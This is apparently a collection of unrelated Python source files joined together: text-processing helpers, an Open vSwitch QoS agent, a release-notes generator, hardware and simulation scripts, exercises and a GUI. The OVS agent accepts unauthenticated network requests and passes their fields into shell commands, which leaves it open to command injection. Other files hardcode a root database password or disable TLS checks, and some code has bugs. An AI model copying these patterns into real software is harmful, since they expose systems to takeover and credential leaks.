j = 0
while j < len(strComAcento):
if i < len(pTexto) and pTexto[i] == strComAcento[j]:
if((j // divisor) <= 1) and ((j % divisor) != 0):
pos = j // divisor
novoTexto += strSemAcento[pos]
else:
pos = (j // divisor)
novoTexto += strSemAcento[pos]
#
i += 1
#
j += 1
#
if i < len(pTexto):
novoTexto += pTexto[i]
#
i += 1
#
return novoTexto
#
def uniao(pTexto1, pTexto2):
lstTexto1 = separaPal(pTexto1)
lstTexto2 = separaPal(pTexto2)
u = []
for texto1 in lstTexto1:
if texto1 not in u:
u.append(texto1)
#
#
for texto2 in lstTexto2:
if texto2 not in u:
u.append(texto2)
#
#
return u
#
# Retorna um dicionário com as palavras e a quantidade de vezes q ela apareceu no texto
def geraTabFreq(pTexto):
lstPalavras = separaPal(pTexto)
dicPalavras = {}
for palavra in lstPalavras:
if palavra not in dicPalavras:
dicPalavras[palavra] = 1
else:
dicPalavras[palavra] += 1
#
#
return dicPalavras
#
# Em números romanos, um algarismo não pode se repetir mais q três vezes ...
def ehRomano(pTexto):
strNum = "IVXLCDM"
for alg in pTexto:
if alg not in strNum:
return False
#
#
return True
#
#Codifica recebe um texto tokenizado
def codifica(pTexto):
preposicoes = ['a', 'ante', 'após', 'com', 'contra','de','do', 'desde','em','entre','para','per',
'perante','por','sem','sob','sobre','trás']
conjuncoes = ['e', 'nem', 'mas também', 'como também', 'bem como', 'mas ainda','mas', 'porém', 'todavia', 'contudo', 'antes']
artigos = ['o', 'a', 'os', 'as', 'um', 'uma', 'uns', 'umas']
mpTratamentos = ['Sr', 'Sra', 'Srta', 'Srs', 'Sras', 'Srª', 'Srº', 'Srªs','Ema','Emª','Drº','Drª', 'Dr']
pTratamentos = ['V. A.','V. Ema.','V. Emas.','V. Revma.','V. Ex.ª','V. Mag.ª','V. M.','V. M. I.','V. S.','V. S.ª','V. O.']
strCodificada = ""
for elem in pTexto:
if elem.isalpha():
if elem.lower() in preposicoes:
strCodificada += 'p'
elif elem.lower() in artigos:
strCodificada += 'a'
elif elem.lower() in conjuncoes:
strCodificada += 'c'
# Inicio Teste
elif elem == 'V':
strCodificada += 'V'
elif elem in mpTratamentos:
strCodificada += 'T'
# Fim Teste
elif elem[0].isupper():
strCodificada += 'M'
elif elem.islower:
strCodificada += 'm'
elif elem.isdigit():
strCodificada += 'N'
elif elem.isalnum():
strCodificada += "A"
else:
strCodificada += elem
#
return strCodificada
#
def ordenaVetPorTamanho(lista):
trocas = False
while not trocas:
trocas = True
for i in range(len(lista) - 1):
if len(lista[i]) < len(lista[i + 1]):
aux = lista[i]
lista[i] = lista[i+1]
lista[i+1] = aux
trocas = False
#
#
#
#
def extraiPadrao(lstTokens, lstPadroes):
tokensCodificados = codifica(lstTokens)
newArray = []
newStr = tokensCodificados
strPalavra = ""
ordenaVetPorTamanho(lstPadroes)
#print("\n\n", tokensCodificados, "\n\n")
for i in range(len(lstPadroes)):
pos = newStr.find(lstPadroes[i])
while pos != -1:
newStr = newStr.replace(lstPadroes[i], "*" * len(lstPadroes[i]), 1)
#print(newStr)
for j in range(pos, pos + len(lstPadroes[i])):
#print(pos)
#strPalavra = strPalavra + lstTokens[j] + " "
if lstTokens[j].isalpha():
strPalavra = strPalavra + lstTokens[j] + " "
else:
strPalavra = strPalavra[:len(strPalavra) - 1]
strPalavra = strPalavra + lstTokens[j] + " "
#
#
newArray.append(strPalavra)
strPalavra = ""
pos = newStr.find(lstPadroes[i])
#
#
return newArray
#
# Dado um arquivo de texto, esta função escreve em um arquivo todos os separadores ...
def selecionaSeparadores(pTexto):
arquivo = open("separadores.txt",'w')
strSeparadores = ""
strSeparadores2 = ""
for texto in pTexto:
if not texto.isalnum() and texto not in strSeparadores:
strSeparadores += texto + "\n"
strSeparadores2 += texto
#
#
arquivo.write(strSeparadores)
arquivo.close()
return strSeparadores2
#
def selecionaSeparadoresv2(pTexto):
strSeparadores = ""
for texto in pTexto:
if not texto.isalpha() and not texto.isdigit():
if texto not in lstSeparadores:
lstSeparadores.append(texto)
#
#
#
return strSeparadores
#
def removeStopW(pTexto, listaStopWords):
resultado = []
if type(pTexto) != "list":
texto = separaPal(pTexto)
#
if type(listaStopWords) != "list":
stopWords = separaPal(listaStopWords)
#
for palavra in texto:
if palavra not in stopWords:
resultado.append(palavra + "\n")
#
return resultado
#
|
#!/usr/bin/env python3
# Import the ZMQ module
import zmq
# Import the Thread and Lock objects from the threading module
from threading import Thread, Lock, Event
# Import the uuid4 function from the UUID module
from uuid import uuid4
# Import the system method from the OS module
from os import system, name
# Import the Pause method from the Signal module
from signal import pause
import time
import subprocess
def cls():
system('cls' if name == 'nt' else 'clear')
class queue_agent_server(Thread):
def __init__(self, host, port):
Thread.__init__(self)
self.shutdown_flag = Event()
self._server_bind(host, port)
# Bind server to socket
def _server_bind(self, host, port):
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REP)
self.socket.bind("tcp://" + host + ":" + str(port))
self.socket.setsockopt(zmq.RCVTIMEO, 500)
def send_msg(self, message):
# Send a message with a header
self.socket.send_json(message)
def run(self):
print('- Started Queue agent')
# Run while thread is active
while not self.shutdown_flag.is_set():
try:
# Wait for request
request = self.socket.recv_json()
# If nothing was received during the timeout
except zmq.Again:
# Try again
continue
# Received a command
else:
# Start time counter
st = time.time()
# Service request, new service
resp = []
for operation in request:
if operation.get('type') == 'reset_req':
r = self.call_reset_service(operation)
resp.append(r)
elif operation.get('type') == 'create_req':
r = self.call_create_service(operation)
resp.append(r)
elif operation.get('type') == 'modify_req':
r = self.call_modify_service(operation)
resp.append(r)
else:
r = {
"id": t_id,
"type": "reset_resp",
"result_code": 1
}
resp.append(r)
self.send_msg(resp)
# Terminate zmq
self.socket.close()
self.context.term()
def call_reset_service(self, operation):
t_id = operation.get('t_id')
min_rate = operation.get('default_queue').get('min_rate')
max_rate = operation.get('default_queue').get('max_rate')
priority = operation.get('default_queue').get('priority')
count = 0
total = 0
default_qos = {}
default_queue = {}
destroy_command = 'for p in `ovs-vsctl list port | grep name | cut -d":" -f2 | sed "s/ //g" | sed "s/\\"//g"` ;do ovs-vsctl clear port $p qos ;done; ovs-vsctl --all destroy qos ; ovs-vsctl --all destroy queue'
(c1, o1) = self.run_system_command(destroy_command)
if c1 == 0:
ports = self.map_ports()
total = len(ports)
for port in ports:
create_qos_command = 'ovs-vsctl create qos type=linux-htb other-config:max-rate=10000000000'
(c2, o2) = self.run_system_command(create_qos_command)
if c2 == 0:
default_qos[port] = o2
add_qos_to_ports_command = 'ovs-vsctl set port ' + port + ' qos=' + o2
(c3, o3) = self.run_system_command(add_qos_to_ports_command)
if c3 == 0:
create_default_queue_command = 'ovs-vsctl create queue other-config:min-rate=' + str(min_rate) + ' other-config:max-rate=' + str(max_rate) + ' other-config:priority=' + str(priority)
(c4, o4) = self.run_system_command(create_default_queue_command)
if c4 == 0:
default_queue[port] = self.create_queue_object(ports[port], o4, min_rate, max_rate, priority)
add_default_queue_to_qos_command = 'ovs-vsctl set qos ' + o2 + ' queues=' + str(ports[port]) + '=' + o4
(c5, o5) = self.run_system_command(add_default_queue_to_qos_command)
if c5 == 0:
count = count + 1
if count == total:
resp = {
"t_id": t_id,
"type": "reset_resp",
"result_code": 0,
"default_qos": default_qos,
"default_queue": default_queue,
"ports": ports
}
else:
self.run_system_command(destroy_command)
resp = {
"t_id": t_id,
"type": "reset_resp",
"result_code": 1
}
return resp
def call_create_service(self, operation):
t_id = operation.get('t_id')
qos = operation.get('qos')
q_id = operation.get('queue').get('q_id')
min_rate = operation.get('queue').get('min_rate')
max_rate = operation.get('queue').get('max_rate')
priority = operation.get('queue').get('priority')
result_code = 1
create_queue_command = 'ovs-vsctl create queue'
if min_rate is not None:
create_queue_command = create_queue_command + ' other-config:min-rate='+ str(min_rate)
if max_rate is not None:
create_queue_command = create_queue_command + ' other-config:max-rate='+ str(max_rate)
if priority is not None:
create_queue_command = create_queue_command + ' other-config:priority='+ str(priority)
(c1, o1) = self.run_system_command(create_queue_command)
if c1 == 0:
add_default_queue_to_qos_command = 'ovs-vsctl set qos ' + qos + ' queues:' + str(q_id) + '=' + o1
(c2, o2) = self.run_system_command(add_default_queue_to_qos_command)
if c2 == 0:
result_code = 0
if result_code == 0:
resp = {
"t_id": t_id,
"type": "create_resp",
"result_code": result_code,
"queue": {
"q_id": q_id,
"uuid": o1
}
}
else:
resp = {
"t_id": t_id,
"type": "create_resp",
"result_code": result_code
}
return resp
def call_modify_service(self, operation):
# ovs-vsctl set queue b0a5449d-e078-4528-9ba6-aa28b865a507 other-config:max-rate=83886080
t_id = operation.get('t_id')
uuid = operation.get('queue').get('uuid')
min_rate = operation.get('queue').get('min_rate')
max_rate = operation.get('queue').get('max_rate')
priority = operation.get('queue').get('priority')
result_code = 1
command = 'ovs-vsctl set queue ' + uuid
if min_rate is not None:
command = command + ' other-config:min-rate='+ str(min_rate)
if max_rate is not None:
command = command + ' other-config:max-rate='+ str(max_rate)
if priority is not None:
command = command + ' other-config:priority='+ str(priority)
(result_code, out) = self.run_system_command(command)
resp = {
"t_id": t_id,
"type": "modify_resp",
"result_code": result_code
}
return resp
def run_system_command(self, command):
print(command)
resp = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
resp.wait()
out = resp.stdout.read().decode().strip()
code = resp.returncode
return code, out
def map_ports(self):
command = 'ovs-vsctl --columns=name,ofport list Interface'
(c1, o1) = self.run_system_command(command)
lines = o1.split('\n')
flag = 0
ports = {}
for line in lines:
if len(line.split(': ')) > 1:
if flag == 0:
name = line.split(': ')[1].replace('"', '')
ports[name] = None
flag = 1
else:
port_no = line.split(': ')[1]
ports[name] = int(port_no)
flag = 0
#p = dict(zip(ports.values(),ports.keys()))
return ports
def create_queue_object(self, q_id, uuid, min_rate, max_rate, priority):
return {
"q_id": q_id,
"uuid": uuid,
"min_rate": min_rate,
"max_rate": max_rate,
"priority": priority
}
if __name__ == "__main__":
cls()
try:
host = '0.0.0.0'
port = 4400
queue_agent_thread = queue_agent_server(host, port)
queue_agent_thread.start()
pause()
except KeyboardInterrupt:
queue_agent_thread.shutdown_flag.set()
queue_agent_thread.join()
print('Exiting')
|
#!/usr/bin/env python
"""
Automatically generate release notes based on DRTVWR tickets
"""
import os, sys
import urllib, urllib2
import yaml, time
from argparse import ArgumentParser
from llbase import llrest
from llbuildutils.codeticket_data import CodeTicketData, CodeTicketDataError
from llbuildutils.sljira import SLJira, SLJiraError
def query_vvm(query, options, body=None, force_staging=False):
"""
Send a query to the viewer version manager
Returns the response from the query
Args:
query: the path for our request
options: our series of options that contains our grid and ssl keys
body: a dict of items that are to be POSTed
force_staging: Use the staging grid, even if production is set in
the options
Returns:
response: the response to the llrest.RESTService() call
"""
# The various fields that we need
cert = (options.ssl_key, options.ssl_cert)
verify = False
authenticated = False
headers = {}
if options.verbose:
print "\n\n====== New VVM Query ======"
response = False
# default to staging, unless told otherwise
url = "https://viewer-version-api-client.staging.secondlife.com/manager"
if not force_staging:
if options.grid in ['prod', 'production']:
url = "https://viewer-version-api.secondlife.com/manager"
verify = True
elif options.grid in ['dev', 'development']:
url = "https://viewer-version-api.dev.secondlife.com/manager"
verify = False
if options.verbose:
print "URL is: %s" % url
print "Query is: %s" % query
print "Cert is: %s" % ",".join(cert)
print "verify is: %s" % verify
print "headers are: %s" % headers
print "body is: %s" % body
if body:
connection = llrest.RESTService("vvm query", url, \
codec=llrest.RESTEncoding.LLSD, authenticated=authenticated)
# llrest.RESTService() will set
# the default 'content-type' to be 'application/llsd'
# when using the RESTEncoding.LLSD codec
# But the VVM won't accept this, and we'll get a 400 error back
# so, force it to 'application/xml+llsd' instead,
# which the VVM _can_ parse
# Interestingly, 'application/x-www-form-urlencoded' will
# also work as a content type
# No, I don't know why either
headers['Content-Type'] = 'application/xml+llsd'
response = connection.post(path=query, data=body, cert=cert, \
headers=headers, verify=verify)
if options.verbose:
print "Response to POST was:"
print response
else:
connection = llrest.RESTService("vvm query", url, \
authenticated=authenticated)
response = connection.get(query, cert=cert, headers=headers, \
verify=verify)
if options.verbose:
print "Response to GET was:"
print response
return response
def get_jira_content(jira_number):
"""
Extract the data from a given field from a specific jira ticket
Args:
jira_number: the jira number to query
Returns:
jira_content: the result of the SLJira.get_issue() call,
plus the extra bits we asked for
"""
jira = SLJira()
# Additional fields we also want:
# customfield_11071 is 'cohort desired'
# A map for the additional fields
# 'Cohort Desired' and 'Viewer Cohort' are for the Viewer
# 'Project' is used so we can get the project key (e.g. DRTVWR/DRTSIM, etc)
# 'Build Id' is for the simulator.
includes = {'Cohort Desired': 'customfield_11071', \
'Viewer Cohort': 'customfield_11070',\
'Release Notes': 'customfield_10110',\
'Project': 'project',
'Build Id': 'customfield_11091'}
# the custom fields we actually want to retrieve
include = []
for k, v in includes.iteritems():
include.append(v)
jira_content = jira.get_issue(jira_number, include)
for k, v in includes.iteritems():
try:
jira_content[k] = jira_content[v]
except KeyError:
#Likely because the item we were looking for wasn't in the jira
# And there's no default value
#jira_content[k] = None
pass
try:
# clean up the dict afterwards
del jira_content[v]
# for some reason, this happens with the viewer cohort field
# We don't get it from get_issue(), but we do get it if
# we request it
# No, I don't understand either
except KeyError:
pass
return jira_content
def get_info_from_jira(jira_number):
"""
Retrieve the build number from the JIRA
"""
build_number = None
jira_content = get_jira_content(jira_number)
project = jira_content['Project']['key']
if project == "DRTVWR":
# in DRTVWRs, the 'Build Link' is the link to the build we want to ship
build_link = jira_content['Build Link']
# A build link looks something like this:
# https://codeticket.secondlife.io/version/518143#
# or like
# https://codeticket.secondlife.io/version/514491
# Have to grab the six digit build number in either case
# Split the string up by the '/', and grab the entry at the very end
# Then grab the first five characters of that string [0:6]
build_number = build_link.split('/')[-1][0:6]
elif project == "DRTSIM":
# For DRTSIMs, we want the 'Build Id' field
# They usually looks like this:
# 2018-09-04T22:24:22.519323
# This field is the id of the image we're going to deploy
# which is not the version of the code that users will be seeing
# Therefore, extract the six digit build id and use codeticket
# to turn this into the build id of the version we're actually deploying
image_id = jira_content['Build Id']
build_id = image_id.split('.')[-1]
build_number = build_id
try:
cohort_name = jira_content['Viewer Cohort'].capitalize()
except KeyError:
# A KeyError typically means we weren't able to find a cohort
cohort_name = ""
release_notes = "None" if not jira_content['Release Notes'] \
else jira_content['Release Notes']
# print jira_content
#import pprint
#pprint.pprint(jira_content)
#print "project: %s" % project
#print "build number: %s" % build_number
#print "cohort_name: %s" % cohort_name
#print "release notes:"
#print release_notes
return project, build_number, cohort_name, release_notes
def write_output(release_meta, release_notes, filename):
"""
Write the release notes out to our file
"""
with open(filename, 'w+') as outfile:
yaml.safe_dump(release_meta, outfile, explicit_start=True, \
allow_unicode=True, default_flow_style=False, width=4096)
outfile.write("---\n")
outfile.write(release_notes.encode('utf8'))
outfile.write("\n")
def get_options():
"""
Get the options from the user
"""
parser = ArgumentParser(description='Automatically generate release notes ')
parser.add_argument("-U", "--url", dest="url", \
help="The URL to the jira instance", default="jira.secondlife.com")
parser.add_argument("-a", "--api", dest="api", \
help="The version of the api", default="latest")
parser.add_argument("-v", "--verbose", dest="verbose", help="Be chatty", \
default=False, action="store_true")
parser.add_argument("-j", "--jira", dest="jira", \
help="The JIRA to generate release notes from", required=True)
parser.add_argument("-g", "--grid", dest="grid", help="The grid to query", \
default="staging")
parser.add_argument("-b", "--build", dest="build_number", \
help="Use a build number different than the one specified in the JIRA.")
parser.add_argument("--sslkey", dest="ssl_key", \
help="The location of the client ssl key")
parser.add_argument("--sslcert", dest="ssl_cert", \
help="The location of the client ssl cert")
options = parser.parse_args()
# jira should be in upper case
# the API will fail if it isn't
#options.jira = options.jira.upper()
if options.ssl_key is None or options.ssl_cert is None:
try:
options.ssl_key = os.environ['SSL_KEY']
options.ssl_cert = os.environ['SSL_CERT']
except KeyError:
print "Client cert and key are required"
print "Either specify them as an option"
print "or in the $SSL_KEY and $SSL_CERT environment variables"
sys.exit(1)
return options
def get_viewer_version_from_build(build_number):
"""
Get the version number from a build
"""
version = None
try:
ct = CodeTicketData()
ct_data = ct.get(build_number)
channel = ct_data.get_viewer_channel_version()[0]
version = ct_data.get_viewer_channel_version()[1]
except CodeTicketDataError:
print "Unable to contact CodeTicket to get information for build %s" % build_number
print "Is the environment variable $CODETICKET_SERVICE set to 'https://codeticket-ext.secondlife.io'?"
raise
return channel, version
def version_manager(options):
"""
Retrieve and process information from the Viewer Version Manager
"""
meta = {}
meta['installers'] = []
meta['title'] = options.version
# New VVM:
# Is this beta, release or project?
try:
viewer_info = query_vvm('cohort/?version=%s' % options.version, options)[0]
meta['channel'] = viewer_info['channel_name']
except IndexError:
print "Unable to retrieve viewer info from Viewer Version Manager"
print "Has this build been added?"
sys.exit(1)
#print options.channelName
if "Second Life Release" in meta['channel']:
meta['release_type'] = 'release'
meta['cohort'] = viewer_info['name']
elif "Second Life Beta" in meta['channel']:
meta['release_type'] = 'beta'
meta['cohort'] = viewer_info['channel_name'].replace("Second Life ", "")
else:
meta['release_type'] = 'project'
meta['cohort'] = viewer_info['channel_name'].replace("Second Life ", "")
# get the download URLS for this release
viewer_urls = query_vvm('cohort/builds/?channel_name=%s&name=%s' % \
(urllib.quote(meta['channel']), \
urllib.quote(viewer_info['name'])), options)
for viewer_url in viewer_urls['builds']:
if viewer_url['version'] == options.version:
for platform in viewer_url['platforms']:
if validate_download_url(platform['url']):
meta['installers'].append(platform)
else:
if options.verbose:
print "Unable to verify download location '%s' for platform '%s'" % (platform['url'], platform)
#print "metadata is"
#pprint(meta)
return meta
def generate_fixed_issues(options):
"""
generate our list of fixed JIRAs, their URLs and summaries
"""
fixed_issues = []
#if options.verbose == True:
# print 'Retrieving linked JIRAs from %s' % (jira_url)
jira = SLJira()
jiras = jira.get_links(options.jira)
if options.verbose == True:
print "Linked to %s are:" % options.jira
for linked_jira in jiras:
print "%s: %s" % (linked_jira['key'], linked_jira['summary'])
for final_jira in jiras:
#print final_jira
# JIRAs that are 'open' or 'in progress' should not be included in the list
# and Omit IQAs, DRTVWR, SEC and WOLF jiras:
if final_jira['status'] in \
['Pending Release', 'Closed', 'Verified', 'Resolved'] and \
final_jira['issuetype'] not in ['QART', 'DRT', 'SEC', 'WOLF']:
jira_key = final_jira['key']
jira_summary = final_jira['summary']
jira_url = final_jira['url']
# Check the jira, to see if there's a BUG attached to it
# if so, use that BUG instead
# External users won't be able to see MAINT jiras, only BUGs
for linked_jira in jira.get_links(final_jira['key']):
# We want the 'project' that that a particular JIRA is in
# so we can figure out which ones are in the BUG project
if jira.get_issue(linked_jira['key'], \
['project'])['project']['key'] == "BUG":
jira_key = linked_jira['key']
jira_summary = linked_jira['summary']
jira_url = linked_jira['url']
if options.verbose:
print "Switching to use public %s instead of internal %s" % \
(linked_jira['key'], final_jira['key'])
break
fixed_issues.append({'jira': jira_key, \
'text': jira_summary, 'url': jira_url})
# fixed issues are now in the 'fixed_issues' list
return fixed_issues
def validate_download_url(url):
"""
check each download location
to make sure it's available
"""
try:
urllib2.urlopen(url).code
except urllib2.URLError, e:
# If we're here, then we had an error when accessing the file
# Check the code returned from urlopen(), anything in the 400 range
# means we can't access the file
# so we shouldn't be presenting it to the user
if e.code / 100 >= 4:
return False
return True
def generate_viewer_release_notes(options):
"""
Generate viewer release notes
"""
options.channel, options.version = \
get_viewer_version_from_build(options.build_number)
#version = options.version.split('.')
# Talk to version manager, and get a bunch of information from there that
# we'll need later on
release_meta = version_manager(options)
release_meta['date'] = int(time.time())
release_meta['menu'] = "viewer"
release_meta['resolved_issues'] = generate_fixed_issues(options)
# Get the notes for this release
# The new static release notes look a little different
# than the previous wiki-fied ones
# The file looks like:
#
# ---
# title: <VERSION_NUMBER>
# date: <Epoch time>
# cohort: <COHORT_NAME>
# menu: "viewer"
# installers:
# - platform: <Human-readable platform name>
# url: <URL to installer>
# icon: <What icon to use>
# resolved_issues:
# - jira: <JIRA ticket number of our resolved issue>
# text: <Summary text of our JIRA
# url: <URL to jira ticket>
# ---
# <Contents of the 'Release Notes' field in markdown>
#
#
filename = "content/viewer/%s.md" % options.version
# Write the release notes out to a file
write_output(release_meta, options.release_notes, filename)
return True
def generate_simulator_release_notes(options):
"""
Generate release notes for the simulator
"""
# Does nothing for right now
print options
filename = "content/server/%s.md" % options.version
write_output(options.release_notes, filename)
return True
def main():
"""
Our main program
"""
options = get_options()
project, build_number, options.cohortName, options.release_notes = \
get_info_from_jira(options.jira)
#print project
#print build_number
if not options.build_number:
options.build_number = build_number
if project == "DRTVWR":
generate_viewer_release_notes(options)
elif project == "DRTSIM":
generate_simulator_release_notes(options)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
sys.exit(1)
|
#!/usr/bin/python
#--------------------------------------
#
# Raspberry Pi HAT 8 Channel ADC V 1.1 - MCP3208 - SPI
#
# Microchip MCP3208 chip
#
# Author : V. R. Iglesias
# Date : 04/06/2017
#
# http://www.nationelectronics.com/
#
#
# Type the following to run the script:
#
# sudo python speedtest.py
#
#--------------------------------------
import os
import spidev
import time
# Function to convert digital data to Volts
def Volts(data, places, Vref):
return round((data * Vref) / float(4096), places)
# Function to read Digital Data from a MCP3208 channel
# Channel 0-7
def ReadADCChannel(channel):
adc = spi.xfer2([6 + ((channel&4) >> 2),(channel&3) << 6, 0])
data = ((adc[1] & 15) << 8) + adc[2]
return data
# Reference Voltage, Jumper selected 5.0 (default), 3.3, 1.0, or 0.3 Volts
Vref = 5.0
# (jumper CE0 on) chip = 0 (default), (jumper CE1 on) chip = 1
chip = 0
# Open SPI bus
spi = spidev.SpiDev()
spi.open(0, chip)
# set the maximux speed
spi.max_speed_hz = 200000
#print("Max speed Hz : {}".format(spi.max_speed_hz))
start_time = time.time()
i = 0
num = 500000
while i < num:
i = i + 1
c0 = ReadADCChannel(0)
thetime = time.time() - start_time
print ("\n--- %s samples" % (num))
print ("\n--- %s seconds" % (thetime))
print ("\n--- %s ksps\n\n" % ( num / thetime / 1000))
|
# Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Code Jam 2021 Round 1B - Problem C. Digit Blocks
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000435baf/00000000007ae37b
#
# Time: precompute: O(N^3 * B * D)
# runtime: O(N * B)
# Space: O(N^3 * B * D)
#
# Usage: python interactive_runner.py python3 testing_tool.py 1 -- python digit_blocks.py
#
# Expected score compared to the max expected score = 19086952424670896.00/19131995794056374.42 = 99.76%
#
from sys import stdout
def read():
return input()
def write(i):
print i
stdout.flush()
def digit_blocks():
grow_h = 0
lookup = [[] for _ in xrange(B+1)]
lookup[0] = range(N)
for _ in xrange(N*B):
d = read()
h = choice[len(lookup[B])][len(lookup[B-1])][len(lookup[B-2])][grow_h][d]
if h < B-2:
grow_h = (grow_h+1)%(B-2)
lookup[h+1].append(lookup[h].pop())
write(lookup[h+1][-1]+1)
D = 10
T, N, B, P = map(int, raw_input().strip().split())
P = [1]
while len(P) < B:
P.append(P[-1]*D)
dp = [[[[0.0 for _ in xrange(B-2)] for _ in xrange(N+1)] for _ in xrange(N+1)] for _ in xrange(N+1)]
choice = [[[[[None for _ in xrange(D)] for _ in xrange(B-2)] for _ in xrange(N+1)] for _ in xrange(N+1)] for _ in xrange(N+1)]
for remain0_cnt in reversed(xrange(N)):
for remain1_cnt in reversed(xrange(N-remain0_cnt+1)):
for remain2_cnt in reversed(xrange(N-remain0_cnt-remain1_cnt+1)):
for grow_h in reversed(xrange(1 if remain0_cnt+remain1_cnt+remain2_cnt == N else B-2)):
for d in xrange(D):
max_ev = float("-inf")
if remain1_cnt:
ev = dp[remain0_cnt+1][remain1_cnt-1][remain2_cnt][grow_h] + P[B-1]*d
if ev > max_ev:
max_ev = ev
choice[remain0_cnt][remain1_cnt][remain2_cnt][grow_h][d] = B-1
if remain2_cnt:
ev = dp[remain0_cnt][remain1_cnt+1][remain2_cnt-1][grow_h] + P[B-2]*d
if ev > max_ev:
max_ev = ev
choice[remain0_cnt][remain1_cnt][remain2_cnt][grow_h][d] = B-2
if remain0_cnt+remain1_cnt+remain2_cnt != N:
ev = dp[remain0_cnt][remain1_cnt][remain2_cnt+(grow_h+1)//(B-2)][(grow_h+1)%(B-2)] + P[grow_h]*d
if ev > max_ev:
max_ev = ev
choice[remain0_cnt][remain1_cnt][remain2_cnt][grow_h][d] = grow_h
dp[remain0_cnt][remain1_cnt][remain2_cnt][grow_h] += max_ev/D
S = 19131995794056374.42
assert(dp[0][0][0][0]/S >= 0.9976)
for case in xrange(T):
digit_blocks()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 19 10:03:15 2017
@author: dgratz
"""
import PyLongQt as pylqt
settings = pylqt.Misc.SettingsIO.getInstance()
proto = pylqt.Protocols.GridProtocol()
settings.readSettings(proto,'D:/synchrony-data/ela7x7NoConn.xml')
lastProto = settings.lastProto.clone()
for row in lastProto.grid:
for node in row:
for side in range(4):
node.setCondConst(0.05,pylqt.Side(side),False,0.0016)
for val in range(2):
proto = lastProto.clone()
proto.pvars.calcIonChanParams()
proto.setDataDir('D:/synchrony-data/ManyParamsConn0026/'+str(val))
print(val)
proto.runSim()
settings.writeSettings(proto,proto.datadir+'/'+proto.simvarfile)
|
"""
single thread, single connection
"""
import mysql.connector
user_db = mysql.connector.connect(
host="localhost",
user="root",
passwd="123456",
database="users"
)
user_cursor = user_db.cursor()
def read_user_from_db():
"""
read user info from db
"""
user_cursor.execute("select * from userinfo")
return user_cursor.fetchall()
if __name__ == "__main__":
for i in xrange(1000):
read_user_from_db()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
题目:利用递归函数调用方式,将所输入的5个字符,以相反顺序打印出来。
"""
def output(ss, ll):
if ll == 0:
return
print ss[ll - 1]
output(ss, ll - 1)
s = raw_input('Input a string:')
ls = len(s)
print ls, s
output(s, ls)
|
# JTSK-350112
# test_rational.py
# Taiyr Begeyev
# t.begeyev@jacobs-university.de
"""
a test program called that uses the class and
its methods to compute 1/2 + 1/8.
Print the result on the screen.
"""
from rational import Rational
# create two instances
r1 = Rational(1, 2)
r2 = Rational(1, 8)
# find the sum and print it
print(r1 + r2)
|
import autodisc as ad
from autodisc.gui.gui import BaseFrame
try:
import tkinter as tk
except:
import Tkinter as tk
from tkinter import ttk
import importlib
import warnings
class ExplorationGUI(BaseFrame):
# TODO: ther seems to be a memory leak, altough a limit for the max_num_of_obs_in_memory is defined, the memory still inreases if more than that are observed
@staticmethod
def default_gui_config():
default_gui_config = ad.gui.BaseFrame.default_gui_config()
default_gui_config.dialog.title = 'Exploration Viewer'
default_gui_config.is_get_obs_from_files = True
default_gui_config.is_get_obs_by_experiment = True
default_gui_config.experiment_num_of_steps = 100
# default_gui_config.max_num_of_obs_in_memory = None
default_gui_config.statistic_columns = []
default_gui_config.detail_views = []
return default_gui_config
def __init__(self, master=None, explorer=None, datahandler=None, gui_config=None, **kwargs):
'''
Takes either an Explorer or a ExplorationDataHandler as input.
Not both!
gui_config:
statistic_columns:
list
['stat_idx']: Index of the statistic in the list of data.stats. Default = 0
['stat_name']: Name of the statistic as under data.stats[stat_idx]['<stat_name>'].
['disp_name']: Name of the stat displayed in the GUI. Default: <stat_name>
detail_views:
list
['type']: Either 'observations' or 'statistics'
['gui']: name of gui that should be used, e.g. ExplorationExperimentGUI
['gui_config']: Configuration of th gui. Default = []
['disp_name']: Name used for the title of the window. Default:<gui>
'''
super().__init__(master=master, gui_config=gui_config, **kwargs)
if explorer is not None and datahandler is not None:
raise ValueError('Input can only be an Explorer or a DataHandler and not both!')
if explorer is not None:
self.explorer = explorer
self.data = self.explorer.data
if datahandler is not None:
self.explorer = None
self.data = datahandler
num_of_detail_guis = len(self.gui_config.detail_views)
self.exp_detail_guis = [None] * num_of_detail_guis
# self.obs_ids_queue = None # holds ids of the results for which the observations are stored
# self.reset_obs_in_memory()
self.create_gui()
self.display_data()
if len(self.data) > 0:
self.selected_run_id = list(self.data.runs.keys())[0]
self.open_experiment_details(self.selected_run_id)
self.tree.focus(self.selected_run_id)
def create_gui(self):
# make the treeview in the frame resizable
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree = ttk.Treeview(self,
selectmode='browse')
self.tree.grid(column=0, row=0, sticky=tk.NSEW)
self.tree.bind('<<TreeviewSelect>>', self.on_treeview_select)
self.scrollbar_y = tk.Scrollbar(self, orient=tk.VERTICAL, command=self.tree.yview)
self.scrollbar_y.grid(column=1, row=0, sticky=tk.NS)
self.scrollbar_x = tk.Scrollbar(self, orient=tk.HORIZONTAL, command=self.tree.xview)
self.scrollbar_x.grid(column=0, row=1, sticky=tk.EW)
self.tree.config(yscrollcommand=self.scrollbar_y.set)
self.tree.config(xscrollcommand=self.scrollbar_x.set)
def on_treeview_select(self, event):
run_id = int(self.tree.focus())
# show the experiment data in the property windows
if run_id != self.selected_run_id:
self.selected_run_id = run_id
self.update_experiment_detail_guis(self.selected_run_id)
def load_run_observations(self, run_id):
obs = self.data[run_id].observations
if obs is None and self.explorer is not None:
[obs, statistics] = self.explorer.system.run(run_parameters=self.data[run_id].run_parameters,
stop_conditions=self.gui_config.experiment_num_of_steps)
# save observations to immediate reuse it
self.data.runs[run_id].observations = obs
# # search if new obs is in memory queue
# if self.obs_ids_queue:
#
# if run_id in self.obs_ids_queue:
# # move the experiment_id to the top of the queue
# idx = self.obs_ids_queue.index(run_id)
# del(self.obs_ids_queue[idx])
# else:
# # remove last item and add new one
# if self.obs_ids_queue[-1]: # could be none
# del self.data[self.obs_ids_queue[-1]]['observations']
# self.obs_ids_queue.pop(-1)
#
# self.obs_ids_queue.insert(0, run_id)
# def reset_obs_in_memory(self):
# '''Sets the number of observations in the memory arcording to gui_config['max_num_of_obs_in_memory'].'''
#
# if self.gui_config.max_num_of_obs_in_memory is None:
